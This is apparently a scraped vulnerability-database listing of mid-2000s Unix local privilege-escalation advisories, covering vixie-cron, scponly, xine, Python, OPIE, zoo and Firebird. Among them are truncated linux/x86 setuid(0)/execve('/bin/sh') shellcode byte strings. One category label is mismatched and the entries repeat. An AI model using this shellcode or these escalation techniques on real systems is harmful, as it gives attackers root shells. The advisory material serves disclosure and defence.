CVE-2006-2607
do_command.c in Vixie cron vixie-cron 4.1 does not check the return code of a setuid call, which might allow local users to gain root privileges if setuid fails in cases such as PAM failures or resource limits, as originally demonstrated by a program that exceeds the process limits as defined in...
Deserialization of untrusted data
do_command.c in Vixie cron vixie-cron 4.1 does not check the return code of a setuid call, which might allow local users to gain root privileges if setuid fails in cases such as PAM failures or resource limits, as originally demonstrated by a program that exceeds the process limits as defined in...
CVE-2006-2607
CVE-2006-2607 refers to a local privilege escalation in vixie-cron 4.1 where do_command.c does not check the return value of setuid(), potentially allowing a root gain if setuid() fails (e.g., PAM limits or resource limits). Connected advisories confirm this vulnerability and document patches/ups...
FreeBSD : scponly -- local privilege escalation exploits (b5a49db7-72fc-11da-9827-021106004fd6)
Max Vozeler reports: If ALL the following conditions are true, administrators using scponly-4.1 or older may be at risk of a local privilege escalation exploit: - the chrooted setuid scponlyc binary is installed - regular non-scponly users have interactive shell access to the box - a user...
Format string
Multiple format string vulnerabilities in xiTK (xitk/main.c) in xine 0.99.4 might allow attackers to cause a denial of service via format string specifiers in an MP3 filename specified on the command line. NOTE: this is a different vulnerability than CVE-2006-1905. In addition, if the only attack...
CVE-2006-2230
Multiple format string vulnerabilities in xiTK (xitk/main.c) in xine 0.99.4 might allow attackers to cause a denial of service via format string specifiers in an MP3 filename specified on the command line. NOTE: this is a different vulnerability than CVE-2006-1905. In addition, if the only attack...
linux/x86 setuid(0) + execve("/bin/sh", ["/bin/sh", NULL]) 31 bytes
No description provided by source. /* Linux/x86 setuid(0) + execve("/bin/sh", ["/bin/sh", NULL]) - 31 bytes */ char shellcode = "\x6a\x17" // push $0x17 "\x58" // pop %eax "\x31\xdb" // xor %ebx, %ebx "\xcd\x80" // int $0x80 "\x31\xd2" // xor %edx, %edx "\x6a\x0b" // push $0xb "\x58" /...
linux/x86 setuid(0),setgid(0) execve(/bin/sh, [/bin/sh, NULL]) 37 bytes
Exploit for linux/x86 platform in category shellcode. linux/x86 setuid(0),setgid(0) execve(/bin/sh, [/bin/sh, NULL]) 37 bytes /* Linux/x86 setuid(0) + setgid(0) +...
linux/x86 - setuid(0) + execve("/bin/sh", ["/bin/sh", NULL]) 31 bytes
linux/x86 setuid(0) + execve("/bin/sh", ["/bin/sh", NULL]) 31 bytes. Shellcode exploit for lin_x86 platform /* Linux/x86 setuid(0) + execve("/bin/sh", ["/bin/sh", NULL]) - 31 bytes */ char shellcode = "\x6a\x17" // push $0x17 "\x58" // pop %eax "\x31\xdb" // xor %ebx, %ebx "\xcd\x80" // int...
linux/x86 setuid(0) + execve("/bin/sh", ["/bin/sh", NULL]) 31 bytes
Exploit for linux/x86 platform in category shellcode. linux/x86 setuid(0) + execve("/bin/sh", ["/bin/sh", NULL]) 31 bytes /* Linux/x86 setuid(0) + execve("/bin/sh",...
linux/x86 setuid(0) setgid(0) execve(/bin/sh [/bin/sh NULL]) 37 bytes
No description provided by source. /* Linux/x86 setuid(0) + setgid(0) + execve("/bin/sh", ["/bin/sh", NULL]) - 37 bytes */ char shellcode = "\x6a\x17" // push $0x17 "\x58" // pop %eax "\x31\xdb" // xor %ebx, %ebx "\xcd\x80" // int $0x80 "\x6a\x2e" // push $0x2e "\x58" // pop %eax "\x53" ...
Stack overflow
Stack-based buffer overflow in Python 2.4.2 and earlier, running on Linux 2.6.12.5 under gcc 4.0.3 with libc 2.3.5, allows local users to cause a "stack overflow," and possibly gain privileges, by running a script from a current working directory that has a long name, related to the realpath...
CVE-2006-1542
Stack-based buffer overflow in Python 2.4.2 and earlier, running on Linux 2.6.12.5 under gcc 4.0.3 with libc 2.3.5, allows local users to cause a "stack overflow," and possibly gain privileges, by running a script from a current working directory that has a long name, related to the realpath...
OPIE -- arbitrary password change
Problem Description: The opiepasswd(1) program uses getlogin(2) to identify the user calling opiepasswd(1). In some circumstances getlogin(2) will return "root" even when running as an unprivileged user. This causes opiepasswd(1) to allow an unprivileged user to configure OPIE authentication for the root user...
Buffer overflow
Buffer overflow in the parse function in parse.c in zoo 2.10 might allow local users to execute arbitrary code via long filename command line arguments, which are not properly handled during archive creation. NOTE: since this issue is local and not setuid, the set of attack scenarios is limited,...
Buffer overflow
Firebird 1.5.2.4731 installs (1) fb_lock_mgr, (2) gds_drop, and (3) fb_inet_server with setuid firebird permissions, which might allow local users to gain privileges via a buffer overflow as identified by CVE-2006-1240, or possibly other vulnerabilities...
Firebird 1.5 - Inet_Server Local Buffer Overflow
Firebird 1.5 - Inet_Server Local Buffer Overflow. source: https://www.securityfocus.com/bid/17077/info Firebird is susceptible to a local buffer-overflow vulnerability. This issue is due to the application's failure to properly check boundaries of user-supplied command-line argument data before...